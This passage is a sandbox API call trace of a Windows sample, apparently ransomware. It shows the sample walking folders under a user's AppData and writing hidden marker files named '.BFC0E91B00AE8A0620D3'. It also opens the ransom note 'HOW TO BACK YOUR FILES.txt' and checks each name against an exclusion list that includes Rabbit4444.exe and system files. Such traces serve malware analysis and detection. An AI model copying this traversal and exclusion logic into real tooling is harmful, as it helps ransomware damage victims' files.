returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\" [0066.781] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0066.781] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.784] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.786] FlushFileBuffers (hFile=0x228) returned 1 [0066.787] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.787] CloseHandle (hObject=0x228) returned 1 [0066.788] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData") returned 99 [0066.788] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.788] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1210fc8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0066.788] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.788] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.788] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.788] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.788] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1210fc8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.788] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.788] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.788] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.788] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.788] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.788] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1210fc8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1210fc8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1210fc8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.788] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.789] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.789] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1210fc8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1210fc8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1210fc8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.789] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0066.789] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.789] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.789] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0066.789] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.790] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.790] CloseHandle (hObject=0x298) returned 1 [0066.790] CloseHandle (hObject=0x228) returned 1 [0066.790] GetCurrentThreadId () returned 0xd98 [0066.790] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0066.790] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC" [0066.790] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0066.790] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0066.790] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC" [0066.790] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\" [0066.790] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0066.790] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.794] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.797] FlushFileBuffers (hFile=0x228) returned 1 [0066.798] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.798] CloseHandle (hObject=0x228) returned 1 [0066.798] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC") returned 94 [0066.798] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.798] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12371ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.799] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.799] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.799] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.799] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.799] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12371ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.799] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.799] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.799] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.799] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.799] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.799] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12371ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12371ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12371ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.799] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.799] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.799] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0066.799] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0066.799] lstrcpyW (in: lpString1=0x130ebf6, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0066.799] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0066.800] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache" [0066.800] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\" [0066.800] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0066.800] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0066.803] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.805] FlushFileBuffers (hFile=0x27c) returned 1 [0066.806] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.806] CloseHandle (hObject=0x27c) returned 1 [0066.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0066.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11bdc8 [0066.807] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x122268 | out: ListHead=0xf6750, ListEntry=0x122268) returned 0x0 [0066.807] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0066.807] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0066.807] lstrcpyW (in: lpString1=0x130ebf6, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0066.807] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0066.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0066.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x11bce8 [0066.808] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x11ce48 [0066.808] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0066.808] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.808] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.808] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0066.808] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0066.808] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0066.808] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0066.808] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0066.809] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0066.809] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0066.809] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0066.809] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0066.809] lstrcpyW (in: lpString1=0x130ebf6, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0066.809] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0066.809] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0066.809] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x11bea8 [0066.809] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x122308 [0066.809] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0066.809] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0066.809] lstrcpyW (in: lpString1=0x130ebf6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0066.809] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0066.809] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x1162b0 [0066.809] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x122168 [0066.809] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0066.810] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.810] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.810] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.810] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.810] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.811] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.811] CloseHandle (hObject=0x27c) returned 1 [0066.811] CloseHandle (hObject=0x228) returned 1 [0066.811] GetCurrentThreadId () returned 0xd98 [0066.811] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0066.811] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp" [0066.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1162b0 | out: hHeap=0xe0000) returned 1 [0066.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0066.811] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp" 